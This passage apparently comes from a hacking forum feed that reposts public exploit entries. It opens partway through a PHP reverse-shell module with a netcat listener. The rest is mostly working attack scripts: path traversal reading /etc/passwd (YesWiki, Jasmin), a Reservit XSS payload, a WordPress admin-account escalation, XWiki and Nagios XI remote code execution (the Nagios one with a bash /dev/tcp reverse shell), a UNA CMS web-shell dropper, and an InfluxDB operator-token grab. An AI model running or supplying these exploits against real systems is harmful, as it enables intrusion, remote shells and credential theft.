(!\$sock) { printit("\$errstr (\$errno)"); exit(1); } \$descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); \$process = proc_open(\$shell, \$descriptorspec, \$pipes); if (!is_resource(\$process)) { printit("ERROR: Can't spawn shell"); exit(1); } stream_set_blocking(\$pipes[0], 0); stream_set_blocking(\$pipes[1], 0); stream_set_blocking(\$pipes[2], 0); stream_set_blocking(\$sock, 0); printit("Successfully opened reverse shell to \$ip:\$port"); while (1) { if (feof(\$sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof(\$pipes[1])) { printit("ERROR: Shell process terminated"); break; } \$read_a = array(\$sock, \$pipes[1], \$pipes[2]); \$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null); if (in_array(\$sock, \$read_a)) { if (\$debug) printit("SOCK READ"); \$input = fread(\$sock, \$chunk_size); if (\$debug) printit("SOCK: \$input"); fwrite(\$pipes[0], \$input); } if (in_array(\$pipes[1], \$read_a)) { if (\$debug) printit("STDOUT READ"); \$input = fread(\$pipes[1], \$chunk_size); if (\$debug) printit("STDOUT: \$input"); fwrite(\$sock, \$input); } if (in_array(\$pipes[2], \$read_a)) { if (\$debug) printit("STDERR READ"); \$input = fread(\$pipes[2], \$chunk_size); if (\$debug) printit("STDERR: \$input"); fwrite(\$sock, \$input); } } fclose(\$sock); fclose(\$pipes[0]); fclose(\$pipes[1]); fclose(\$pipes[2]); proc_close(\$process); function printit (\$string) { if (!\$daemon) { print "\$string\n"; } } ?> EOF echo [*] Zipping to shellModule.zip zip -r shellModule.zip shellModule rm -rf shellModule echo [*] Please login to the WBCE admin panel to upload and install the module echo [*] Starting listener nc -lvnp $port echo echo echo "[*] Done!" echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"
  14. HireHackking

    YesWiki 4.5.1 - Unauthenticated Path Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal # Exploit Author: Al Baradi Joy # Exploit Date: April 6, 2025 # CVE ID: CVE-2025-31131 # Vendor Homepage: https://yeswiki.net/ # Software Link: https://github.com/YesWiki/yeswiki # Affected Version: < 4.5.2 # Tested On: YesWiki 4.5.1 on Ubuntu 22.04 # Vulnerability Type: Unauthenticated Path Traversal (LFI) # CVSS Score: 8.6 (High) # CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N # Description: # YesWiki before version 4.5.2 is vulnerable to unauthenticated path traversal via the 'squelette' parameter. # A remote attacker can exploit this issue to read arbitrary files on the server, such as /etc/passwd. import requests import sys def banner(): print("=" * 80) print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal (CVE-2025-31131)") print(" Exploit Author: Al Baradi Joy") print("=" * 80) def exploit(target, filename="/etc/passwd"): if not target.startswith("http"): target = "http://" + target traversal = "../" * 8 encoded_file = filename.replace("/", "%2f") payload = f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css" url = target.rstrip("/") + payload try: print(f"[+] Target: {target}") print(f"[+] Attempting to read: {filename}") response = requests.get(url, timeout=10) if response.status_code == 200 and "root:" in response.text: print("[+] Exploit successful. File contents:\n") print(response.text) else: print("[!] Exploit failed or file not readable.") print(f"Status Code: {response.status_code}") if len(response.text) < 200: print(f"Response:\n{response.text}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") if __name__ == "__main__": banner() if len(sys.argv) < 2: print(f"Usage: python3 {sys.argv[0]} <target_url> [file_to_read]") print(f"Example: python3 {sys.argv[0]} http://victim.com /etc/passwd") sys.exit(1) target_url = sys.argv[1] file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd" exploit(target_url, file_to_read)
  15. HireHackking

    Apache Tomcat 11.0.3 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution # Exploit Author: Al Baradi Joy # CVE: CVE-2025-24813 # Date: 2025-04-06 # Vendor Homepage: https://tomcat.apache.org/ # Software Link: https://tomcat.apache.org/download-90.cgi # Version: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98 # Tested on: Apache Tomcat 10.1.33 # CVSS: 9.8 (CRITICAL) # CWE: CWE-44, CWE-502 # Reference: https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html import requests import random import string import sys def rand_filename(length=6): return ''.join(random.choices(string.ascii_lowercase, k=length)) def generate_payload(interact_url): # Java serialized payload gadget triggering DNS interaction return f'\xac\xed\x00\x05...' # Replace with actual gadget bytes or generator def exploit(target, interact_url): filename = rand_filename() put_url = f"{target}/{filename}.session" get_url = f"{target}/{filename}" headers = { "Content-Range": "bytes 0-452/457", "Content-Type": "application/octet-stream" } payload = generate_payload(interact_url) print("[+] Exploit for CVE-2025-24813") print("[+] Made By Al Baradi Joy\n") print(f"[+] Uploading payload to: {put_url}") r1 = requests.put(put_url, data=payload, headers=headers) if r1.status_code == 201: print("[+] Payload uploaded successfully.") else: print(f"[-] Upload failed with status: {r1.status_code}") return print(f"[+] Triggering payload via: {get_url}") cookies = {"JSESSIONID": f".{filename}"} r2 = requests.get(get_url, cookies=cookies) print(f"[+] Trigger request sent. Check for DNS callback to: {interact_url}") if __name__ == "__main__": # Display banner first print("[+] Exploit for CVE-2025-24813") print("[+] Made By Al Baradi Joy\n") # Ask the user for the target domain and interact URL target_url = input("Enter the target domain (e.g., http://localhost:8080): ") interact_url = input("Enter your interactsh URL: ") exploit(target_url, interact_url)
  16. HireHackking

    Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Reservit Hotel < 3.0 - Admin+ Stored XSS # Date: 2024-10-01 # Exploit Author: Ilteris Kaan Pehlivan # Vendor Homepage: https://wpscan.com/plugin/reservit-hotel/ # Version: Reservit Hotel 2.1 # Tested on: Windows, WordPress, Reservit Hotel < 3.0 # CVE : CVE-2024-9458 The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). 1. Install and activate Reservit Hotel plugin. 2. Go to Reservit hotel > Content 3. Add the following payload to the Button text > French field sane save: " style=animation-name:rotation onanimationstart=alert(/XSS/)// 4. The XSS will trigger upon saving and when any user will access the content dashboard again References: https://wpscan.com/vulnerability/1157d6ae-af8b-4508-97e9-b9e86f612550/ https://www.cve.org/CVERecord?id=CVE-2024-9458
  17. HireHackking

    WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress User Registration & Membership Plugin <= 4.1.1 - Unauthenticated Privilege Escalation # Exploit Author: Al Baradi Joy # Date: 2025-04-07 # Vendor Homepage: https://wordpress.org/plugins/user-registration/ # Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.1.zip # Version: <= 4.1.1 # Tested on: WordPress 6.4.3 # CVSS: 9.8 (CRITICAL) # CWE: CWE-269 # References: # https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation # https://patchstack.com/database/wordpress/plugin/user-registration/vulnerability/wordpress-user-registration-membership-plugin-4-1-2-unauthenticated-privilege-escalation-vulnerability # https://nvd.nist.gov/vuln/detail/CVE-2025-2563 import re import json import requests import random import string from urllib.parse import urljoin def banner(): print("\n[+] CVE-2025-2563 - WP User Registration Privilege Escalation") print("[+] Made By Al Baradi Joy\n") def randstring(n=8): return ''.join(random.choices(string.ascii_lowercase, k=n)) def get_regex(content, pattern, group=1, name=""): match = re.search(pattern, content) if not match: raise ValueError(f"[-] Could not extract {name} (Pattern: {pattern})") return match.group(group) def exploit(target): session = requests.Session() username = randstring() password = randstring() + "!@" email = f"{username}@exploit.test" try: print("[+] Getting registration page...") r = session.get(urljoin(target, "/membership-registration/"), timeout=10) r.raise_for_status() page = r.text nonce = get_regex(page, r'"user_registration_form_data_save":"(.*?)"', name="nonce") formid = get_regex(page, r"id='user-registration-form-([0-9]+)'", name="formid") memval = get_regex(page, r'id="ur-membership-select-membership-([0-9]+)', name="membership value") memname = get_regex(page, r'data-field-id="membership_field_([0-9]+)"', name="membership field name") front_nonce = get_regex(page, r'name="ur_frontend_form_nonce" value="(.*?)"', name="frontend_nonce") loc_nonce = get_regex(page, r'ur_membership_frontend_localized_data = {"_nonce":"(.*?)"', name="localized_frontend_nonce") print("[+] Submitting registration form...") form_data = [ {"field_name": "user_login", "value": username, "field_type": "text", "label": "Username"}, {"field_name": "user_email", "value": email, "field_type": "email", "label": "User Email"}, {"field_name": "user_pass", "value": password, "field_type": "password", "label": "User Password"}, {"field_name": "user_confirm_password", "value": password, "field_type": "password", "label": "Confirm Password"}, {"value": memval, "field_type": "radio", "label": "membership", "field_name": f"membership_field_{memname}"} ] payload = { "action": "user_registration_user_form_submit", "security": nonce, "form_data": json.dumps(form_data), "form_id": formid, "registration_language": "en-US", "ur_frontend_form_nonce": front_nonce, "is_membership_active": memval, "membership_type": memval } r2 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"), data=payload, timeout=10) if '"success":true' not in r2.text: print("[-] Registration form failed.") return print("[+] Sending membership registration as administrator...") member_payload = { "action": "user_registration_membership_register_member", "security": loc_nonce, "members_data": json.dumps({ "membership": "1", "payment_method": "free", "start_date": "2025-3-29", "username": username, "role": "administrator" }) } r3 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"), data=member_payload, timeout=10) if '"success":true' in r3.text: print("[+] Exploit Successful!") print(f"[+] Admin Username: {username}") print(f"[+] Admin Password: {password}") else: print("[-] Membership escalation failed.") except Exception as e: print(f"[-] Exploit failed: {str(e)}") if __name__ == "__main__": banner() target = input("Enter target WordPress site (e.g., http://example.com): ").strip().rstrip('/') if not target.startswith("http"): target = "http:
  18. HireHackking

    XWiki Platform 15.10.10 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: XWiki Platform - Remote Code Execution # Exploit Author: Al Baradi Joy # Exploit Date: April 6, 2025 # CVE ID: CVE-2025-24893 # Vendor Homepage: https://www.xwiki.org/ # Software Link: https://github.com/xwiki/xwiki-platform # Version: Affected versions up to and including XWiki 15.10.10 # Tested Versions: XWiki 15.10.10 # Vulnerability Type: Remote Code Execution (RCE) # CVSS Score: 9.8 (Critical) # CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H # Description: # XWiki Platform suffers from a critical vulnerability where any guest user can # execute arbitrary code remotely through the SolrSearch endpoint. This can lead # to a full server compromise, including the ability to execute commands on the # underlying system. The vulnerability impacts the confidentiality, integrity, # and availability of the XWiki installation. The issue has been patched in XWiki # versions 15.10.11, 16.4.1, and 16.5.0RC1. # Proof of Concept: Yes # Categories: XWiki, Remote Code Execution, CVE-2025, RCE # References: # - GHSA Advisory: https://github.com/advisories/GHSA-rr6p-3pfg-562j # - NVD CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-24893 # - GitHub Exploit Link: https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py import requests # Banner def display_banner(): print("="*80) print("Exploit Title: CVE-2025-24893 - XWiki Platform Remote Code Execution") print("Exploit Author: Al Baradi Joy") print("GitHub Exploit: https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py") print("="*80) # Function to detect the target protocol (HTTP or HTTPS) def detect_protocol(domain): https_url = f"https://{domain}" http_url = f"http://{domain}" try: response = requests.get(https_url, timeout=5, allow_redirects=True) if response.status_code < 400: print(f"[✔] Target supports HTTPS: {https_url}") return https_url except requests.exceptions.RequestException: print("[!] HTTPS not available, falling back to HTTP.") try: response = requests.get(http_url, timeout=5, allow_redirects=True) if response.status_code < 400: print(f"[✔] Target supports HTTP: {http_url}") return http_url except requests.exceptions.RequestException: print("[✖] Target is unreachable on both HTTP and HTTPS.") exit(1) # Exploit function def exploit(target_url): target_url = detect_protocol(target_url.replace("http://", "").replace("https://", "").strip()) exploit_url = f"{target_url}/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d" try: print(f"[+] Sending request to: {exploit_url}") response = requests.get(exploit_url, timeout=10) # Check if the exploit was successful if response.status_code == 200 and "root:" in response.text: print("[✔] Exploit successful! Output received:") print(response.text) else: print(f"[✖] Exploit failed. Status code: {response.status_code}") except requests.exceptions.ConnectionError: print("[✖] Connection failed. Target may be down.") except requests.exceptions.Timeout: print("[✖] Request timed out. Target is slow or unresponsive.") except requests.exceptions.RequestException as e: print(f"[✖] Unexpected error: {e}") # Main execution if __name__ == "__main__": display_banner() target = input("[?] Enter the target URL (without http/https): ").strip() exploit(target)
  19. HireHackking

    Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Nagiosxi authenticated Remote Code Execution # Date: 17/02/2024 # Exploit Author: Calil Khalil # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Version: Nagios Xi 5.6.6 # Tested on: Ubuntu # CVE : CVE-2019-15949 # # python3 exp.py -t https://<target>/ -b /<nagiosxi-path>/ -u user -p 'password' -lh <rev-ip> -lp <rev-port> -k (ignore cert) # import argparse import re import requests import urllib3 class Nagiosxi(): def __init__(self, target, parameter, username, password, lhost, lport, ignore_ssl): self.url = target self.parameter = parameter self.username = username self.password = password self.lhost = lhost self.lport = lport self.ignore_ssl = ignore_ssl self.login() def upload(self, session): print("Uploading Malicious Check Ping Plugin") upload_url = self.url + self.parameter + "/admin/monitoringplugins.php" upload_token = session.get(upload_url, verify=not self.ignore_ssl) nsp = re.findall('var nsp_str = "(.*)";', upload_token.text) print("Upload NSP Token: " + nsp[0]) payload = "bash -c 'bash -i >& /dev/tcp/" + self.lhost + "/" + self.lport + " 0>&1'" file_data = { "upload": "1", "nsp": nsp[0], "MAX_FILE_SIZE": "20000000" } file_upload = { "uploadedfile": ("check_ping", payload, "application/octet-stream", {"Content-Disposition": "form-data"}) } session.post(upload_url, data=file_data, files=file_upload, verify=not self.ignore_ssl) payload_url = self.url + self.parameter + "/includes/components/profile/profile.php?cmd=download" session.get(payload_url, verify=not self.ignore_ssl) def login(self): session = requests.Session() login_url = self.url + self.parameter + "/login.php" token = session.get(login_url, verify=not self.ignore_ssl) nsp = re.findall('name="nsp" value="(.*)">', token.text) print("Login NSP Token: " + nsp[0]) post_data = { "nsp": nsp[0], "page": "auth", "debug": "", "pageopt": "login", "redirect": "", "username": self.username, "password": self.password, "loginButton": "" } login = session.post(login_url, data=post_data, verify=not self.ignore_ssl) if "Home Dashboard" in login.text: print("Logged in!") else: print("Unable to login!") self.upload(session) if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2019–15949 Nagiosxi authenticated Remote Code Execution') parser.add_argument('-t', metavar='<Target base URL>', help='Example: -t http://nagios.url/', required=True) parser.add_argument('-b', metavar='<Base Directory>', help="Example: -b /nagiosxi/", required=True) parser.add_argument('-u', metavar='<Username>', help="Example: -a username", required=True) parser.add_argument('-p', metavar='<Password>', help="Example: -p 'password'", required=True) parser.add_argument('-lh', metavar='<Listener IP>', help="Example: -lh 127.0.0.1", required=True) parser.add_argument('-lp', metavar='<Listener Port>', help="Example: -lp 1337", required=True) parser.add_argument('-k', action='store_true', help="Ignore SSL certificate verification") args = parser.parse_args() urllib3.disable_warnings() try: print('CVE-2019-15949 Nagiosxi authenticated Remote Code Execution') Nagiosxi(args.t, args.b, args.u, args.p, args.lh, args.lp, args.k) except KeyboardInterrupt: print("\nBye Bye!") exit()
  20. HireHackking

    UNA CMS 14.0.0-RC - PHP Object Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability # Author: Egidio Romano aka EgiX # Software link.......: https://unacms.com [-] Software Links: https://unacms.com https://github.com/unacms/una [-] Affected Versions: All versions from 9.0.0-RC1 to 14.0.0-RC4. [-] Vulnerability Description: The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script. Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this method, user input passed through the "profile_id" POST parameter is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as writing and executing arbitrary PHP code. <?php /* ------------------------------------------------------------------------------------ UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability ------------------------------------------------------------------------------------ author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://unacms.com +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script. Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this method, user input passed through the "profile_id" POST parameter is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as writing and executing arbitrary PHP code. [-] Original Advisory: https://karmainsecurity.com/KIS-2025-01 */ set_time_limit(0); error_reporting(E_ERROR); print "\n+------------------------------------------------------------+"; print "\n| UNA CMS <= 14.0.0-RC4 PHP Object Injection Exploit by EgiX |"; print "\n+------------------------------------------------------------+\n"; if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n"); if ($argc != 2) { print "\nUsage......: php $argv[0] <URL>\n"; print "\nExample....: php $argv[0] http://localhost/una/"; print "\nExample....: php $argv[0] https://unacms.com/\n\n"; die(); } define('ON_APACHE', true); define('SH_PATH', ON_APACHE ? './cache_public/sh.phtml' : './cache_public/sh.php'); class GuzzleHttp_Cookie_SetCookie { private $data = ['Expires' => '', 'Value' => '<?php eval(base64_decode($_SERVER[\'HTTP_C\'])); ?>']; } class GuzzleHttp_Cookie_FileCookieJar { private $cookies, $filename = SH_PATH, $storeSessionCookies = true; function __construct() { $this->cookies = [new GuzzleHttp_Cookie_SetCookie]; } } $url = $argv[1]; $ch = curl_init(); $chain = serialize(new GuzzleHttp_Cookie_FileCookieJar); $chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain); $chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain); curl_setopt($ch, CURLOPT_URL, "{$url}menu.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]); curl_setopt($ch, CURLOPT_POSTFIELDS, "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=" . urlencode($chain)); print "\n[+] Performing PHP Object Injection"; curl_exec($ch); curl_close($ch); print "\n[+] Launching shell\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url . SH_PATH); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $phpcode = "print '____'; print shell_exec(base64_decode('%s')); print '____';"; while(1) { print "\nuna-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]); preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n"); }
  21. HireHackking

    Jasmin Ransomware - Arbitrary File Download (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Jasmin Ransomware - (Authenticated) Arbitrary File Download # Google Dork: N/A # Date: 22-03-2025 # Exploit Author: bRpsd cy[at]live.no # Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware # Software Link: https://github.com/codesiddhant/Jasmin-Ransomware # Version: N/A # Tested on: MacOS local xampp Authentication can be easily bypassed due to SQL Injection as mentioned in: https://www.exploit-db.com/exploits/52091 Vulnerable file:Web Panel/download_file.php Vulnerable parameter:file Vulnerable code: <?php session_start(); if(!isset($_SESSION['username']) ){ header("Location: login.php"); } $file=$_GET['file']; if(!empty($file)){ // Define headers header("Cache-Control: public"); header("Content-Description: File Transfer"); header("Content-Disposition: attachment; filename=$file"); header("Content-Type: text/encoded"); header("Content-Transfer-Encoding: binary"); // Read the file readfile($file); exit; }else{ echo 'The file does not exist.'; } ?> Proof of concept: http://localhost/Jasmin-Ransomware/Web Panel/download_file.php?file=database/db_conection.php Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br, zstd Connection: keep-alive Cookie: PHPSESSID=88e519f73f9013f560ed3f0514015d8c Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 GET: HTTP/1.1 200 OK Date: Sat, 22 Mar 2025 09:42:09 GMT Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1 X-Powered-By: PHP/7.4.29 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: public Pragma: no-cache Content-Description: File Transfer Content-Disposition: attachment; filename=database/db_conection.php Content-Transfer-Encoding: binary Content-Length: 95 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/encoded;charset=UTF-8
  22. HireHackking

    InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: InfluxDB OSS Operator Privilege Escalation via BusinessLogic Flaw # Date: 22/03/2024 # Exploit Author: Andrea Pasin (Xenom0rph97) # Researcher Homepage: https://xenom0rph97.github.io/xeno/ # GitHub Exploit repo: https://github.com/XenoM0rph97/CVE-2024-30896 # Software Link: https://www.influxdata.com/products/influxdb/ # Version: 2.x <=> 2.7.11 # Tested on: InfluxDB OSS 2.x # CVE: CVE-2024-30896 # CVSS Base Score: 9.1 # CVSS v3.1 Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H # CVE-2024-30896 ## Summary A business logic flaw in influxdb allows users who own a valid allAccess token to escalate their privileges at operator level by listing current authorization tokens. ## Scenario Attacker might be a user which was gained access by an administrator via an allAccess token only within their organization. This user's permissions will allow full control over the organization but will still prevent him to interact with other orgs. ## Impact This vulnerability would allow a user to obtain unrestricted access to the influxdb instance. A similar condition might fully compromise Confidentiality, Integrity and Availability of data owned by users of different organizations. Additionally, since operator token has administrative permissions, Availability and Integrity of the entire influxdb instance might be compromised. ## Prerequisites/Limitations 1. Attacker must have a valid allAccess token 2. allAccess token must have been created in the same Org where an operator token resides (ex. same Org as Admin user) 3. Attacker must be able to interact with influxdb instance via CLI or APIs (influxClient) ## Steps to Reproduce ### Case 1: Exploitation via influxdb APIs: *Python Version*: 3 *Requirements*: `influxdb_client==1.41.0` *Script usage* ``` % python3 ./CVE-2024-30896.py -h usage: CVE-2024-30896.py [-h] [-t TOKEN] [-e ENDPOINTURL] [-v [VERBOSE]] [-vv [VVERBOSE]] optional arguments: -h, --help show this help message and exit -t TOKEN, --token TOKEN Custom or allAccess token to access influx DB instance -e ENDPOINTURL, --endpointUrl ENDPOINTURL Endpoint Url of influxdb instance (ex. " https://myInfluxdbInstance:8086/") -v [VERBOSE], --verbose [VERBOSE] Enable verbose logging - INFO -vv [VVERBOSE], --vverbose [VVERBOSE] Enable verbose logging - DEBUG ``` ### Case 2: Exploitation via influx CLI 1. Execute: `influx auth ls -t <allAccessToken> | grep write:/orgs`. This will list all current active operator tokens on the influxdb instance. *Example* ``` # Using an allAccess token influx auth ls -t U1OuqmFC{REDACTED} | grep U1OuqmFC{REDACTED} 0cc41c3b050e5000 U1OuqmFC{REDACTED} admin 0cb9c92ee228b000 [read:orgs/87d0746948a3b3f5/authorizations write:orgs/87d0746948a3b3f5/authorizations read:orgs/87d0746948a3b3f5/buckets write:orgs/87d0746948a3b3f5/buckets read:orgs/87d0746948a3b3f5/dashboards write:orgs/87d0746948a3b3f5/dashboards read:/orgs/87d0746948a3b3f5 read:orgs/87d0746948a3b3f5/sources write:orgs/87d0746948a3b3f5/sources read:orgs/87d0746948a3b3f5/tasks write:orgs/87d0746948a3b3f5/tasks read:orgs/87d0746948a3b3f5/telegrafs write:orgs/87d0746948a3b3f5/telegrafs read:/users/0cb9c92ee228b000 write:/users/0cb9c92ee228b000 read:orgs/87d0746948a3b3f5/variables write:orgs/87d0746948a3b3f5/variables read:orgs/87d0746948a3b3f5/scrapers write:orgs/87d0746948a3b3f5/scrapers read:orgs/87d0746948a3b3f5/secrets write:orgs/87d0746948a3b3f5/secrets read:orgs/87d0746948a3b3f5/labels write:orgs/87d0746948a3b3f5/labels read:orgs/87d0746948a3b3f5/views write:orgs/87d0746948a3b3f5/views read:orgs/87d0746948a3b3f5/documents write:orgs/87d0746948a3b3f5/documents read:orgs/87d0746948a3b3f5/notificationRules write:orgs/87d0746948a3b3f5/notificationRules read:orgs/87d0746948a3b3f5/notificationEndpoints write:orgs/87d0746948a3b3f5/notificationEndpoints read:orgs/87d0746948a3b3f5/checks write:orgs/87d0746948a3b3f5/checks read:orgs/87d0746948a3b3f5/dbrp write:orgs/87d0746948a3b3f5/dbrp read:orgs/87d0746948a3b3f5/notebooks write:orgs/87d0746948a3b3f5/notebooks read:orgs/87d0746948a3b3f5/annotations write:orgs/87d0746948a3b3f5/annotations read:orgs/87d0746948a3b3f5/remotes write:orgs/87d0746948a3b3f5/remotes read:orgs/87d0746948a3b3f5/replications write:orgs/87d0746948a3b3f5/replications] # Listing all available tokens passing allAccess token and retrieving only operator level tokens influx auth ls -t U1OuqmFC{REDACTED} | grep write:/orgs 0cbb920e128e5000 gerKYLO0Ph_ibUk0y{REDACTED} admin 0cb9c92ee228b000 [read:/authorizations write:/authorizations read:/buckets write:/buckets read:/dashboards write:/dashboards read:/orgs write:/orgs read:/sources write:/sources read:/tasks write:/tasks read:/telegrafs write:/telegrafs read:/users write:/users read:/variables write:/variables read:/scrapers write:/scrapers read:/secrets write:/secrets read:/labels write:/labels read:/views write:/views read:/documents write:/documents read:/notificationRules write:/notificationRules read:/notificationEndpoints write:/notificationEndpoints read:/checks write:/checks read:/dbrp write:/dbrp read:/notebooks write:/notebooks read:/annotations write:/annotations read:/remotes write:/remotes read:/replications write:/replications] influxdb_client==1.41.0 import influxdb_client import argparse import logging import sys argParser = argparse.ArgumentParser() argParser.add_argument("-t", "--token", type=str, help="Custom or allAccess token to access influx DB instance") argParser.add_argument("-e", "--endpointUrl", type=str, help="Endpoint Url of influxdb instance (ex. \"https://myInfluxdbInstance:8086/\")") argParser.add_argument("-v", "--verbose", type=bool, const=True, nargs='?', help="Enable verbose logging - INFO") argParser.add_argument("-vv", "--vverbose", type=bool, const=True, nargs='?', help="Enable verbose logging - DEBUG") args = argParser.parse_args() # Using user retrieved values or default (hardcoded) ones all_access_token = "<allAccessToken>" influx_endpoint_url = "<influxdbEndpointUrl>" # Defining some colors red = "\033[31m" yellow = "\033[93m" purple = "\33[1;95m" green = "\033[0;92m" cyan = "\033[96m" bold ="\033[1m" endc = "\033[39m" if args.vverbose == True: logging.basicConfig(level=logging.DEBUG) elif args.verbose == True: logging.basicConfig(level=logging.INFO) logger = logging.getLogger() if args.token: token = args.token else: logger.debug(f"{yellow}User did not set a token, using default one{endc}") token = all_access_token if args.endpointUrl: endpointUrl = args.endpointUrl else: logger.debug(f"{yellow}User did not set an endpoint Url for influxdb, using default one{endc}") endpointUrl = influx_endpoint_url logger.info(f"{cyan}Connecting to influx DB instance{endc}") # Connecting to influxdb instance try: conn = influxdb_client.InfluxDBClient( url=endpointUrl, token=token, debug=False, verify_ssl=True ) # Verify InfluxDB connection health = conn.ping() if not health: logger.error(f"{red}Unable to connect to db instace " + endpointUrl + f"{endc}") print(f"{red}Quitting execution...{endc}") sys.exit(1) except Exception as e: logger.error(f"{red}Failed to connect to db instance: " + endpointUrl + " Error: " + str(e) + f"{endc}") print(f"{red}Quitting execution...{endc}") sys.exit(1) # Retrieving all current auths logger.debug(f"{yellow}Retrieving all auth tokens{endc}") print(f"{cyan}Enumerating current authorizations...{endc}") try: auths = conn.authorizations_api().find_authorizations() except Exception as e: logger.error(f"{red}Unable to retrieve authorizations. ERR: " + str(e) +f"{endc}") print(f"{red}Unable to retrieve authorizations. Quitting...{endc}") sys.exit(1) if not auths: print(f"{cyan}No Authorization tokens found on the instance{endc}") sys.exit(1) print(f"{cyan}{str(len(auths))} tokens found on the instance{endc}\n") # Extracting operator token -> Parsing permissions to look for ("org = None" and "authType = write/auths"), not 100% efficiency -> TO OPTIMIZE logger.debug(f"{yellow}Parsing auth permissions to retrieve operator tokens{endc}") print(f"{cyan}Enumerating all operator tokens:{endc}") op_tokens = [] # In order to understand if a token is of type "operator" we need to enumerate all permissions and look for "write/auths" on org 